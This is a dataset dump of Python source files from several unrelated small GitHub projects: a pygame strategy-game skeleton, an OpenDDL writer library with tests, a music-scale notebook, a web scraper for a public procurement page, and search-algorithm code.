repo_name
stringlengths 6
97
| path
stringlengths 3
341
| text
stringlengths 8
1.02M
|
|---|---|---|
davincif/Amila-RTS
|
world_map/camp.py
|
<gh_stars>0
from world_map.camp_types import CampType
from world_map.bioma_types import BiomaType
class Camp():
__type = None
__bioma = None
def __init__(self, bioma):
self.__bioma = bioma
|
davincif/Amila-RTS
|
main.py
|
#python imports
import random
#external libs imports
import pygame
#local imports
from world_map import wmap
#casting classes to easly acess
world_map = wmap.world_map
#information about the screen pygame.display.Info()
screen_info = None
#the diplay 'pygame.display.set_mode'
game_display = None
#game clock
clock = None
#game loop status
gl_running = None
#the game name
game_name = '<NAME>'
#the game frames per second
game_fps = 30
#initialize the needed libraries and the game modules
def game_init():
global gl_running
global screen_info
global game_display
global clock
print('initializing...')
#initialize libraries
print('\tpygame...')
pygame.init()
#initialize global variables
gl_running = True
screen_info = pygame.display.Info()
game_display = pygame.display.set_mode((screen_info.current_w, screen_info.current_h))
pygame.display.set_caption(game_name)
clock = pygame.time.Clock()
random.seed()
#initialize modules
print('\tAmila modules...')
world_map.preprint = '\t\t'
world_map.init()
print('done\n')
#deinitialize the needed libraries and the game modules
def game_quit():
print('quiting...')
#quiting libraries
print('\tpygame...')
pygame.quit()
#quiting modules
print('\tAmila modules...')
world_map.preprint = '\t\t'
world_map.quit()
#quiting python itself
print('done')
quit()
def main():
global screen_info
global game_display
global clock
global gl_running
global game_name
global game_fps
game_init()
world_map.generate_map()
# main loop
while gl_running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
gl_running = False;
pygame.display.update()
clock.tick(game_fps)
game_quit()
if __name__ == '__main__':
main()
|
davincif/Amila-RTS
|
world_map/camp_types.py
|
from enum import Enum
# from fuzy_prob.prob import Prob
class CampType():
CAMP = 1
CAVE = 2
DOUGEON = 3
LAKE = 4
SEA = 5
AQUIFER = 6
class CampProb():
# CAMP =
# CAVE =
# DOUGEON =
# LAKE =
# SEA =
# AQUIFER =
pass
|
davincif/Amila-RTS
|
fuzy_prob/prob.py
|
from enum import Enum
import random
maxnum = 1000
def flit_a_coin():
return random.randint(0, maxnum)
class Prob():
ALWAYS = 1000
EXTREMELY_COMMOM = 900
VERY_COMMOM = 700
COMMOM = 500
UNCOMMOM = 300
RARE = 150
VERY_RARE = 75
EXTREMELY_RARE = 40
NEVER = 0
def fuzify(self, value):
if(value == self.NEVER):
return self.NEVER
elif(value <= self.EXTREMELY_RARE):
return self.EXTREMELY_RARE
elif(value <= self.VERY_RARE):
return self.VERY_RARE
elif(value <= self.RARE):
return self.RARE
elif(value <= self.UNCOMMOM):
return self.UNCOMMOM
elif(value <= self.COMMOM):
return self.COMMOM
elif(value <= self.VERY_COMMOM):
return self.VERY_COMMOM
elif(value <= self.EXTREMELY_COMMOM):
return self.EXTREMELY_COMMOM
elif(value > self.EXTREMELY_COMMOM):
return self.ALWAYS
|
manosaladata/contrataciones-estado-emergencia
|
R/Archivos Temp/ws.py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
DRIVER_PATH = 'C:/chromedriver.exe'
driver = webdriver.Chrome(executable_path=DRIVER_PATH)
driver.get("https://apps.osce.gob.pe/perfilprov-ui/ficha/20293847038")
#driver.get('https://google.com')
#options = Options()
#options.headless = True
#options.add_argument("--window-size=1920,1200")
#driver = webdriver.Chrome(options=options, executable_path=DRIVER_PATH)
#driver.get("https://apps.osce.gob.pe/perfilprov-ui/estadistica/20293847038#inhabMJ")
#print(driver.page_source)
#players = driver.find_elements_by_xpath('/"]')
driver.find_element_by_css_selector("span.score-legend").click()
text=driver.find_elements_by_css_selector(".data-container")
lista = []
for p in range(len(text)):
lista.append(text[p].text)
print(lista)
#driver.quit()
#print(a)
|
Squareys/PyDDL
|
src/pyddl.py
|
from abc import abstractmethod
import math
from enum import Enum
__author__ = "<NAME>"
__version__ = "0.1.0"
class DdlPrimitiveDataType(Enum):
"""
Enum for primitive structure data types.
For convenience use `import DdlPrimitiveDataType from pyddl as DataType`
for example.
"""
bool = 0
int8 = 1
int16 = 2
int32 = 3
int64 = 4
unsigned_int8 = 5
unsigned_int16 = 6
unsigned_int32 = 7
unsigned_int64 = 8
half = 9
float = 10
double = 11
string = 12
ref = 13
type = 14
class DdlPrimitive:
"""
An OpenDDL primitive structure.
"""
def __init__(self, data_type, data, name=None, vector_size=0):
"""
Constructor
:param data_type: primitive data type (see pyddl.enum.PrimitiveType)
:param data: list of values. If vector_size != 0, the list should contain tuples
:param name: name of the primitive structure
:param vector_size: size of the contained vectors
"""
self.data_type = data_type
self.name = name
self.vector_size = vector_size
self.data = data
def is_simple_primitive(self):
if len(self.data) == 1:
return self.vector_size <= 4
elif len(self.data) <= 4:
return self.vector_size == 0
return False
class DdlStructure:
"""
An OpenDDL structure.
"""
def __init__(self, identifier, name=None, children=[], props=dict()):
"""
Constructor
:param identifier: structure identifier
:param name: optional name
:param children: list of substructures
"""
self.children = children
self.properties = props
self.identifier = identifier
self.name = name if name != "" else None
self.name_is_global = True
def is_simple_structure(self):
"""
A structure is simple if it contains exactly one primitive and has no properties or name.
:return: true if this structure is simple
"""
if len(self.children) != 1:
# a simple structure may contain only one primitive substructure
return False
if len(self.properties) > 1:
# a simple structure does not have more than one property
return False
if self.name is not None:
# simple children don't have a name
return False
if not isinstance(self.children[0], DdlPrimitive):
# the only substructure needs to be a primitive
return False
return self.children[0].is_simple_primitive()
def add_structure(self, identifier, name=None, children=[], props=dict()):
"""
Add a substructure
:param identifier: structure identifier
:param name: optional name
:param children: list of substructures or primitives
:param props: dict of properties
:return: the created structure
"""
s = DdlStructure(identifier, name, children, props)
self.children.append(s)
return s
def add_primitive(self, data_type, data=[], name=None, vector_size=0):
"""
Add a primitive substructure
:param data_type: primitive data type (see pyddl.enum.PrimitiveType)
:param data: list of values. If vector_size != 0, the list should contain tuples
:param name: name of the primitive structure
:param vector_size: size of the contained vectors
:return: self (for method chaining)
"""
self.children.append(DdlPrimitive(data_type, data, name, vector_size))
return self
class DdlDocument:
"""
An OpenDDL document.
"""
def __init__(self):
self.structures = []
def add_structure(self, identifier, name=None, children=[], props=dict()):
"""
Add a substructure
:param identifier: structure identifier
:param name: optional name
:param children: list of substructures and primitives
:param props: dict of properties
:return: the created structure
"""
s = DdlStructure(identifier, name, children, props)
self.structures.append(s)
return s
class DdlWriter:
"""
Abstract class for classes responsible for writing OpenDdlDocuments.
"""
def __init__(self, document):
"""
Constructor
:param document: document to write
"""
self.doc = document
def get_document(self):
"""
:return: document to be written by this writer.
"""
return self.doc
@abstractmethod
def write(self, filename):
"""
Write the writers document to a specified file.
:param filename: path to a file to write to
:return: nothing
"""
pass
class DdlTextWriter(DdlWriter):
"""
OpenDdlWriter which writes OpenDdlDocuments in human-readable text form.
"""
def __init__(self, document, rounding=6):
"""
Constructor
:param document: document to write
:param rounding: number of decimal places to keep or None to keep all
"""
DdlWriter.__init__(self, document)
self.file = None
self.indent = B""
self.rounding = rounding
def to_float_byte_rounded(self, f):
if (math.isinf(f)) or (math.isnan(f)):
return B"0.0"
else:
return bytes(str(round(f, self.rounding)), "UTF-8")
@staticmethod
def to_float_byte(f):
if (math.isinf(f)) or (math.isnan(f)):
return B"0.0"
else:
return bytes(str(f), "UTF-8")
@staticmethod
def to_int_byte(i):
return bytes(str(i), "UTF-8")
@staticmethod
def to_string_byte(s):
return B"\"" + bytes(s, "UTF-8") + B"\""
@staticmethod
def to_bool_byte(b):
return B"true" if b else B"false"
@staticmethod
def to_ref_byte(structure):
if structure is None:
return B"null"
return (B"$" if structure.name_is_global else B"%") + structure.name
@staticmethod
def id(val):
return val
def inc_indent(self):
"""
Increase the current line indent.
"""
self.indent = self.indent + B"\t"
def dec_indent(self):
"""
Decrease the current line indent.
"""
self.indent = self.indent[:-1]
def write(self, filename):
self.file = open(filename, "wb")
if len(self.get_document().structures) != 0:
# first element will never prepend a empty line
structure = self.get_document().structures[0]
self.file.write(self.structure_as_text(structure))
previous_was_simple = structure.is_simple_structure()
for structure in self.get_document().structures[1:]:
if not (previous_was_simple and structure.is_simple_structure()):
self.file.write(B"\n")
previous_was_simple = structure.is_simple_structure()
self.file.write(self.structure_as_text(structure))
self.file.close()
def property_as_text(self, prop):
"""
Create a text representation for a key-value-pair. E.g.: "key = value".
:param prop: a pair to represent as text
:return: a byte-string in the form "key = value"
"""
value = prop[1]
if isinstance(value, bool):
value_bytes = self.to_bool_byte(value)
elif isinstance(value, int):
value_bytes = self.to_int_byte(value)
elif isinstance(value, float):
value_bytes = self.to_float_byte(value)
elif isinstance(value, DdlStructure):
value_bytes = self.to_ref_byte(value)
elif isinstance(value, str):
value_bytes = B"\"" + bytes(value, "UTF-8") + B"\""
elif isinstance(value, bytes):
value_bytes = B"\"" + value + B"\""
else:
raise TypeError("ERROR: Unknown property type for property \"{}\"".format(prop[0]))
return prop[0] + B" = " + value_bytes
def primitive_as_text(self, primitive, no_indent=False):
"""
Get a text representation of the given primitive structure
:param primitive: primitive structure to get the text representation for
:param no_indent: if true will skip adding the first indent
:return: a byte string representing the primitive structure
"""
lines = [(B"" if no_indent else self.indent) + bytes(primitive.data_type.name, "UTF-8")]
if primitive.vector_size > 0:
lines.append(B"[" + self.to_int_byte(primitive.vector_size) + B"]")
if primitive.name is not None:
lines.append(B" $" + primitive.name + B" ")
has_comment = hasattr(primitive, 'comment')
if has_comment:
lines.append(B"\t\t// " + primitive.comment)
# find appropriate conversion function
if primitive.data_type in [DdlPrimitiveDataType.bool]:
# bool
to_bytes = self.to_bool_byte
elif primitive.data_type in [DdlPrimitiveDataType.double, DdlPrimitiveDataType.float]:
# float/double
to_bytes = self.to_float_byte if self.rounding is None else self.to_float_byte_rounded
elif primitive.data_type in [DdlPrimitiveDataType.int8, DdlPrimitiveDataType.int16, DdlPrimitiveDataType.int32,
DdlPrimitiveDataType.int64, DdlPrimitiveDataType.unsigned_int8,
DdlPrimitiveDataType.unsigned_int16, DdlPrimitiveDataType.unsigned_int32,
DdlPrimitiveDataType.unsigned_int64, DdlPrimitiveDataType.half]:
# integer types
to_bytes = self.to_int_byte
elif primitive.data_type in [DdlPrimitiveDataType.string]:
# string
if primitive.vector_size == 0 and len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0], bytes) else self.to_string_byte
else:
if len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0][0], bytes) else self.to_string_byte
elif primitive.data_type in [DdlPrimitiveDataType.ref]:
to_bytes = self.to_ref_byte
else:
raise TypeError("Encountered unknown primitive type.")
if len(primitive.data) == 0:
lines.append(B"\n" if has_comment else B" ")
lines.append(B"{ }")
elif primitive.is_simple_primitive():
lines.append(B"\n" if has_comment else B" ")
if primitive.vector_size == 0:
lines.append(B"{" + B", ".join(map(to_bytes, primitive.data)) + B"}")
else:
lines.append(B"{{" + (B", ".join(map(to_bytes, primitive.data[0]))) + B"}}")
else:
lines.append(B"\n" + self.indent + B"{\n")
self.inc_indent()
if primitive.vector_size == 0:
if hasattr(primitive, 'max_elements_per_line'):
n = primitive.max_elements_per_line
data = primitive.data
lines.append(self.indent + ((B",\n" + self.indent).join(
[B", ".join(group) for group in
[map(to_bytes, data[i:i + n]) for i in range(0, len(data), n)]])) + B"\n")
else:
lines.append(self.indent + (B", ".join(map(to_bytes, primitive.data))) + B"\n")
else:
if hasattr(primitive, 'max_elements_per_line'):
n = primitive.max_elements_per_line
data = primitive.data
if len(data) == 1:
data = data[0]
# there is exactly one vector, we will handle its components for formatting with
# max_elements_per_line.
lines.append(self.indent + B"{" + ((B",\n" + self.indent + B" ").join(
[(B", ".join(map(to_bytes, line))) for line in
[data[i:i + n] for i in range(0, len(data), n)] # group generator
]) + B"}\n"))
else:
lines.append(self.indent + B"{" + ((B"},\n" + self.indent + B"{").join(
[(B"}, {".join(B", ".join(map(to_bytes, vec)) for vec in group)) for group in
[data[i:i + n] for i in range(0, len(data), n)]])) + B"}\n")
else:
lines.append(self.indent + B"{" + (B"}, {".join(
B", ".join(map(to_bytes, vec)) for vec in primitive.data)) + B"}\n")
self.dec_indent()
lines.append(self.indent + B"}")
return lines
def structure_as_text(self, structure):
"""
Get a text representation of the given structure
:param structure: structure to get the text representation for
:return: a byte string representing the structure
"""
lines = [self.indent + structure.identifier]
if structure.name:
lines.append(B" $" if structure.name_is_global else B" %")
lines.append(structure.name)
if len(structure.properties) != 0:
lines.append(B" (" + B", ".join(self.property_as_text(prop) for prop in structure.properties.items()) + B")")
has_comment = hasattr(structure, 'comment')
if has_comment:
lines.append(B"\t\t// " + structure.comment)
if structure.is_simple_structure() and not has_comment:
lines.append(B" {")
lines.extend(self.primitive_as_text(structure.children[0], True))
lines.append(B"}\n")
else:
lines.append(B"\n" + self.indent + B"{\n")
previous_was_simple = False
first = structure.children[0]
self.inc_indent()
for sub in structure.children:
if isinstance(sub, DdlPrimitive):
lines.extend(self.primitive_as_text(sub))
lines.append(B"\n")
previous_was_simple = False
else:
if not (previous_was_simple and sub.is_simple_structure()) and not sub == first:
lines.append(B"\n")
lines.append(self.structure_as_text(sub))
previous_was_simple = sub.is_simple_structure()
self.dec_indent()
lines.append(self.indent + B"}\n")
return B''.join(lines)
@staticmethod
def set_max_elements_per_line(primitive, elements):
"""
Set how many elements should be displayed per line for a primitive structure.
When there is more than one element, every vector is handled as one element.
If there is merely one element in the primitive data and this element is a vector,
the components of the vector are treated as the elements.
:param primitive: the primitive
:param elements: max amount of elements per line
:return: the provided primitive with an added `max_elements_per_line` attribute
"""
if isinstance(primitive, DdlPrimitive):
primitive.max_elements_per_line = elements
return primitive
else:
raise TypeError("max_elements_per_line can only be set for DdlPrimitive")
@staticmethod
def set_comment(structure, comment):
"""
Set a one-line comment to a structure or primitive structure
:param structure: the structure to add the one-line comment to
:param comment: the comment to add
:return: the provided structure with an added `comment` attribute
"""
if isinstance(structure, DdlStructure) or isinstance(structure, DdlPrimitive):
if isinstance(comment, bytes):
structure.comment = comment
else:
structure.comment = bytes(str(comment), "UTF-8")
return structure
else:
raise TypeError("set_comment can only be set for DdlPrimitive or DdlStructure")
class DdlCompressedTextWriter(DdlTextWriter):
"""
OpenDdlWriter which writes OpenDdlDocuments in compressed (probably not human-readable) text form.
Making use of "Whitespace never has any meaning, so OpenDDL files can be formatted in any manner preferred.", see
OpenDDL specification.
Faster than DdlTextWriter and produces smaller files.
"""
def __init__(self, document, rounding=6):
"""
Constructor
:param document: document to write
:param rounding: number of decimal places to keep or None to keep all
"""
super().__init__(document, rounding)
def write(self, filename):
self.file = open(filename, "wb")
if len(self.get_document().structures) != 0:
for structure in self.get_document().structures:
self.file.write(self.structure_as_text(structure))
self.file.close()
def property_as_text(self, prop):
"""
Create a text representation for a key-value-pair. E.g.: "key=value".
:param prop: a pair to represent as text
:return: a byte-string in the form "key=value"
"""
value = prop[1]
if isinstance(value, bool):
value_bytes = self.to_bool_byte(value)
elif isinstance(value, int):
value_bytes = self.to_int_byte(value)
elif isinstance(value, float):
value_bytes = self.to_float_byte(value)
elif isinstance(value, str):
value_bytes = B"\"" + bytes(value, "UTF-8") + B"\""
elif isinstance(value, bytes):
value_bytes = B"\"" + value + B"\""
else:
raise TypeError("ERROR: Unknown property type for property \"{}\"".format(prop[0]))
return prop[0] + B"=" + value_bytes
def primitive_as_text(self, primitive):
"""
Get a text representation of the given primitive structure
:param primitive: primitive structure to get the text representation for
:return: a byte string representing the primitive structure
"""
lines = [bytes(primitive.data_type.name, "UTF-8")]
if primitive.vector_size > 0:
lines.append(B"[" + self.to_int_byte(primitive.vector_size) + B"]")
if primitive.name is not None:
lines.append(B"$"+ primitive.name)
# find appropriate conversion function
if primitive.data_type in [DdlPrimitiveDataType.bool]:
# bool
to_bytes = self.to_bool_byte
elif primitive.data_type in [DdlPrimitiveDataType.double, DdlPrimitiveDataType.float]:
# float/double
to_bytes = self.to_float_byte if self.rounding is None else self.to_float_byte_rounded
elif primitive.data_type in [DdlPrimitiveDataType.int8, DdlPrimitiveDataType.int16, DdlPrimitiveDataType.int32,
DdlPrimitiveDataType.int64, DdlPrimitiveDataType.unsigned_int8,
DdlPrimitiveDataType.unsigned_int16, DdlPrimitiveDataType.unsigned_int32,
DdlPrimitiveDataType.unsigned_int64, DdlPrimitiveDataType.half]:
# integer types
to_bytes = self.to_int_byte
elif primitive.data_type in [DdlPrimitiveDataType.string]:
# string
if primitive.vector_size == 0 and len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0], bytes) else self.to_string_byte
else:
if len(primitive.data) > 0:
to_bytes = self.id if isinstance(primitive.data[0][0], bytes) else self.to_string_byte
elif primitive.data_type in [DdlPrimitiveDataType.ref]:
to_bytes = self.to_ref_byte
else:
raise TypeError("Encountered unknown primitive type.")
if len(primitive.data) == 0:
lines.append(B"{}")
elif primitive.is_simple_primitive():
if primitive.vector_size == 0:
lines.append(B"{" + to_bytes(primitive.data[0]) + B"}")
else:
lines.append(B"{{" + (B",".join(map(to_bytes, primitive.data[0]))) + B"}}")
else:
if primitive.vector_size == 0:
lines.append(B"{" + B",".join(map(to_bytes, primitive.data)) + B"}")
else:
lines.append(B"{{" + (B"},{".join(B",".join(map(to_bytes, vec)) for vec in primitive.data)) + B"}}")
return lines
def structure_as_text(self, structure):
"""
Get a text representation of the given structure
:param structure: structure to get the text representation for
:return: a byte string representing the structure
"""
lines = [structure.identifier]
if structure.name:
lines.append(B"$" if structure.name_is_global else B"%")
lines.append(structure.name)
if len(structure.properties) != 0:
lines.append(B"(" + B",".join(self.property_as_text(prop) for prop in structure.properties.items()) + B")")
lines.append(B"{")
for sub in structure.children:
if isinstance(sub, DdlPrimitive):
lines.extend(self.primitive_as_text(sub))
else:
lines.append(self.structure_as_text(sub))
lines.append(B"}")
return B''.join(lines)
# Space reserved for a specification based OpenDdlBinaryWriter ;)
# Hope there will be some specification for it some day.
|
Squareys/PyDDL
|
tests/DdlTextWrterTest.py
|
import os
import unittest
from collections import OrderedDict
from pyddl import DdlPrimitiveDataType as DataType
from pyddl import *
__author__ = "<NAME>"
class DdlTextWriterTest(unittest.TestCase):
def readContents(self, filename):
"""
Open, read the contents and then close a file.
:param filename: name of the file to read the contents of
:return: Contents of the file with given filename
"""
file = open(filename)
contents = file.read()
file.close()
return contents
def assertFilesEqual(self, test_filename, expected_filename):
"""
Check whether the contents of two files are equal
:param test_filename: name of the file to test
:param expected_filename: name of the file containing expected content
"""
self.assertEqual(self.readContents(test_filename), self.readContents(expected_filename))
def tearDown(self):
try:
os.remove("test.ddl")
os.remove("test_compressed.ddl")
except FileNotFoundError:
pass # test_empty failed?
def test_empty(self):
# create document
document = DdlDocument()
# write document
DdlTextWriter(document).write("test.ddl")
# check if file was created
try:
self.assertTrue(os.path.isfile("test.ddl"))
except FileNotFoundError:
self.fail("DdlTextWriter did not create the specified file.")
def test_empty_compressed(self):
# create document
document = DdlDocument()
# write document
DdlCompressedTextWriter(document).write("test_compressed.ddl")
# check if file was created
try:
self.assertTrue(os.path.isfile("test_compressed.ddl"))
except FileNotFoundError:
self.fail("DdlCompressedTextWriter did not create the specified file.")
@staticmethod
def create_document():
document = DdlDocument()
human_struct = document.add_structure(
B"Human", B"human1",
[DdlStructure(B"Name", children=[DdlPrimitive(DataType.string, ["Peter"])]),
DdlStructure(B"Age",
children=[DdlPrimitive(DataType.unsigned_int16, [21])])],
props=OrderedDict([(B"Weird", True), (B"Funny", 12)]))
DdlTextWriter.set_comment(human_struct, B"not an alien")
human_struct.add_structure(B"Self", children=[DdlPrimitive(DataType.ref, [human_struct])])
# a primitive array
prim = DdlTextWriter.set_comment(DdlPrimitive(DataType.int32, range(1, 100)), B"100")
DdlTextWriter.set_max_elements_per_line(prim, 10)
# a array of vectors of primitives
vects = DdlPrimitive(DataType.int32, [(x, x * 2) for x in range(1, 100)], None, 2)
DdlTextWriter.set_max_elements_per_line(vects, 5)
# add the above primitives to the document, wrapped by another structure
document.add_structure(B"SomethingElse", children=[DdlStructure(B"AnArray", children=[prim])])
document.add_structure(B"MoreElse", children=[DdlStructure(B"AnVectorArray", children=[vects])])
return document
def test_full(self):
# create document
document = self.create_document()
# write document
DdlTextWriter(document).write("test.ddl")
self.assertFilesEqual("test.ddl", "expected.ddl")
def test_full_compressed(self):
# create document
document = self.create_document()
# write document
DdlCompressedTextWriter(document).write("test_compressed.ddl")
self.assertFilesEqual("test_compressed.ddl", "expected_compressed.ddl")
if __name__ == "__main__":
unittest.main()
|
grveek/Music
|
musicGV20201015-Copy1.py
|
<reponame>grveek/Music
#!/usr/bin/env python
# coding: utf-8
# In[2]:
import numpy as np
import pandas as pd
# In[3]:
half_steps_sharps = ["A","A#","B","C","C#","D","D#","E","F","F#","G","G#"]
half_steps_flats = ["A","Bb","B","C","Db","D","Eb","E","F","Gb","G","Ab"]
half_steps = np.arange(0,12,1)
# In[4]:
key_major_half_steps = np.array([0,2,4,5,7,9,11])
key_minor_half_steps = np.array([0,2,3,5,7,8,10])
key_dorian_half_steps = np.array([0,2,3,5,7,9,10])
key_phrygian_half_steps = np.array([0,1,3,5,7,8,10])
key_lydian_half_steps = np.array([0,2,4,6,7,9,11])
key_mixolydian_half_steps = np.array([0,2,4,5,7,9,10])
key_locrian_half_steps = np.array([0,1,3,5,6,8,10])
key_byzantine_half_steps = np.array([0,1,4,5,6,8,10])
key_enigmatic_half_steps = np.array([0,2,3,5,7,9,10])
key_neopolitan_maj_half_steps = np.array([0,1,3,5,7,9,11])
key_neopolitan_min_half_steps = np.array([0,1,3,5,7,8,11])
key_hungarian_maj_half_steps = np.array([0,3,4,6,7,9,10])
key_hungarian_min_half_steps = np.array([0,2,3,6,7,8,11])
key_mixolydianb6_half_steps = np.array([0,2,4,5,7,8,10])
key_harmonic_min_half_steps = np.array([0,2,3,5,7,8,11])
key_lydian_dom_half_steps = np.array([0,2,4,6,7,9,10])
key_diminished_half_steps = np.array([0,2,3,5,6,8,9])
key_half_diminished_half_steps = np.array([0,1,3,4,6,7,9])
key_dorian_sharp4_half_steps = np.array([0,2,3,6,7,9,10])
notes = ["A", "B", "C", "D", "E", "F", "G"]
chord_symbols = ["m", "dim", "+", "add9", "sus2", "sus4", "sus2/4", "b5", "m7b5", "7", "Maj7", "m7" ]
sharp_flat = ["#", "b"]
position = ["I", "II", "III", "IV", "V", "VI", "VII"]
scales_modes = ["Major", "Minor", "Dorian", "Phrygian", "Lydian", "Mixolydian", "Locrian", "Byzantine", "Enigmatic","Neopolitan Major","Neopolitan Minor","Hungarian Major","Hungarian Minor","Mixolydian b6","Harmonic Minor","Lydian Dominant","Diminished","Half-Diminished", "Dorian Sharp 4"]
compiled_scales = [key_major_half_steps,key_minor_half_steps,key_dorian_half_steps,key_phrygian_half_steps,key_lydian_half_steps,key_mixolydian_half_steps,key_locrian_half_steps,key_byzantine_half_steps,key_enigmatic_half_steps,key_neopolitan_maj_half_steps,key_neopolitan_min_half_steps,key_hungarian_maj_half_steps,key_hungarian_min_half_steps,key_mixolydianb6_half_steps,key_harmonic_min_half_steps,key_lydian_dom_half_steps,key_diminished_half_steps,key_half_diminished_half_steps,key_dorian_sharp4_half_steps]
# In[5]:
scales_modes_hs_df_chart = pd.DataFrame()
for i in scales_modes:
for j in compiled_scales:
scales_modes_hs_df_chart[i] = j
scales_modes_hs_df_chart
# In[6]:
df = scales_modes_hs_df_chart
df.iloc[2:5,4:8]
# In[ ]:
# In[ ]:
# In[ ]:
# In[73]:
# hs notes dictionary
hs_notes = dict((keys,values) for keys,values in zip(half_steps,half_steps_sharps))
z = hs_notes
# In[66]:
#test to see if one can create a key list of notes
key = []
for i in key_major_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A major key:", key)
# In[71]:
#test #2 to see if one can create a key list of notes
key = []
for i in key_minor_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A minor key:", key)
# In[70]:
#test #3 to see if one can create a key list of notes
key = []
for i in key_dorian_half_steps:
for x in z.keys():
if x == i:
key.append(z[i])
print("A minor Dorian key:", key)
# In[69]:
key = []
zq = [x for i in key_minor_half_steps for x in z.keys() if x == i]
zq
# list comprehension grabs the matching keys but need values printed (right now - does not function)
# In[1]:
# define a function to obtain the notes to a called key/mode/scale
def get_scale():
scale_req = input(str("Input required key >>> "))
# code in user-selected HS list
# consider using dataframe object above?
# temp is hard wired to test function - user will select
temp = key_major_half_steps
hs_notes = dict((keys,values) for keys,values in zip(half_steps,half_steps_sharps))
temp_z = hs_notes
temp_z1 = temp + (half_steps_sharps.index(scale_req) - half_steps_sharps.index("A"))
for i in range(len(temp_z1)):
if temp_z1[i] > 12:
temp_z1[i] = temp_z1[i] - 12
else:
i
key = []
for i in temp_z1:
for x in temp_z.keys():
if x == i:
key.append(temp_z1[i])
del temp
del hs_notes
del temp_z
del temp_z1
print("The", scale_req, "scale is:", key)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
|
rystrauss/cannibals
|
cannibals/search/informed_search.py
|
"""Implementations of informed search strategies.
Author: <NAME>
"""
from cannibals.problems import AbstractProblem
from cannibals.search.base import SearchStrategy, Node
from cannibals.search.frontiers import PriorityFrontier
class AStarSearch(SearchStrategy):
"""Implementation of A* search.
A* is the most widely known form of best-first search. It evaluates nodes by combining g(n), the cost to reach the
node, and h(n), the estimated cost to get from the node to the goal. Thus, if we are trying to find the cheapest
solution, a reasonable thing to try first is the node with the lowest value of g(n)+ h(n).
"""
@staticmethod
def search(problem, heuristic_fn=None):
"""Attempts to solve the given problem by performing a search over the state space.
Args:
problem: The `AbstractProblem` instance that is to be solved.
heuristic_fn: A function that accepts a state of `problem` as the single argument and returns an estimate
of the cost to reach the goal from that state. If None, no heuristic is used and this becomes uniform
cost search.
Returns:
A 2-tuple with:
solution: A list of actions that represents the solution to the problem.
nodes_generated: The number of nodes that were generated during the search process.
"""
assert isinstance(problem, AbstractProblem)
node = Node(problem.initial_state, 0)
generated_nodes = 1
if problem.goal_test(node.state):
return node.solution
frontier = PriorityFrontier([node])
explored = set()
solution = None
while not frontier.empty():
node = frontier.pop()
if problem.goal_test(node.state):
solution = node.solution
break
explored.add(node)
children = node.expand(problem)
generated_nodes += len(children)
for child in node.expand(problem, heuristic_fn=heuristic_fn):
if not (child in explored or child in frontier):
frontier.push(child)
elif child in frontier:
frontier.maybe_update(child)
return solution, generated_nodes
|
rystrauss/cannibals
|
cannibals/problems/__init__.py
|
<filename>cannibals/problems/__init__.py
from .base import AbstractProblem
|
rystrauss/cannibals
|
setup.py
|
import setuptools
with open('README.md', 'r') as fp:
long_description = fp.read()
setuptools.setup(
name='cannibals',
version='0.1',
packages=setuptools.find_packages(),
url='https://github.com/rystrauss/cannibals',
license='LICENSE',
author='<NAME>',
author_email='<EMAIL>',
description='Search strategies for problem-solving agents.',
long_description=long_description,
long_description_content_type='text/markdown',
python_requires='>=3.6'
)
|
rystrauss/cannibals
|
cannibals/problems/base.py
|
"""Provides the base abstract problem class, which represents a search problem.
Author: <NAME>
"""
from abc import ABC, abstractmethod
class AbstractProblem(ABC):
"""An abstract problem, from which all problem classes should inherit.
A problem in this case is referring to a search problem that can be solved by a goal-based problem-solving
agent. The problem's states are represented atomically -- that is, as a whole with no internal structure visible
to the agent.
A problem consists of an *initial state*, a description of *actions*, a *transition model*, a *goal test*, and a
*path cost function*.
States can take any form for a particular problem, so long as their `__hash__` and `__eq__` methods are
implemented to reflect that logically equivalent states are determined to be equal and are mapped to the same
location in a hash table.
"""
def __init__(self, initial_state):
"""Constructs a new `AbstractProblem`.
Args:
initial_state: The problem's initial state.
"""
self._initial_state = initial_state
@property
def initial_state(self):
"""The initial state of the problem."""
return self._initial_state
@abstractmethod
def get_actions(self, state):
"""Given a particular state, this method returns the set of possible actions that can be executed in that state.
Args:
state: The state whose actions are to be retrieved.
Returns:
An iterable containing all actions that can be taken in `state`.
"""
pass
@abstractmethod
def goal_test(self, state):
"""Tests whether or not a particular state is a goal state.
Args:
state: The state to be tested.
Returns:
True if `state` is a goal state and False otherwise.
"""
pass
@abstractmethod
def transition(self, state, action):
"""This method defines the transition model of the problem.
Given a state and an action, it will return the next state along with the step cost of that transition.
Args:
state: The current state.
action: The action being taken in `state`.
Returns:
The tuple `(next_state, step_cost)` where `next_state` is the state that we transitioned to and `step_cost`
is the cost associated with doing that transition.
"""
pass
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/heuristics.py
|
"""Provides heuristic functions for the sliding tile puzzle.
Author: <NAME>
"""
from cannibals.problems.sliding_tile import SlidingTilePuzzle
def make_heuristic_fn(problem, heuristic_fn):
"""Makes a heuristic function for the sliding tile puzzle.
This function should be used to construct the function that will be passed to the search strategy.
Args:
problem: The `SlidingTilePuzzle` for which a heuristic function should be constructed.
heuristic_fn: The heuristic function being used. E.g. `misplaced_tiles`.
Returns:
A function that accepts a single state as an argument and returns the estimated cost of that state, using the
provided heuristic.
"""
assert isinstance(problem, SlidingTilePuzzle)
return lambda state: heuristic_fn(state, problem.goal_state)
def misplaced_tiles(state, goal):
"""Computes the misplaced tiles heuristic.
This heuristic counts the number of tiles on the board that are not in their goal positions.
It is admissible and consistent.
Args:
state: The current state being evaluated.
goal: The goal state.
Returns:
The heuristic value, which is the number of tiles that are out of place.
"""
count = 0
for a, b in zip(state.tile_list, goal.tile_list):
if a != b:
count += 1
return count
|
rystrauss/cannibals
|
cannibals/search/__init__.py
|
<reponame>rystrauss/cannibals
from .base import SearchStrategy
from .informed_search import AStarSearch
from .uninformed_search import BreadthFirstSearch
from .uninformed_search import DepthFirstSearch
from .uninformed_search import UniformCostSearch
|
rystrauss/cannibals
|
cannibals/problems/sliding_tile/puzzle.py
|
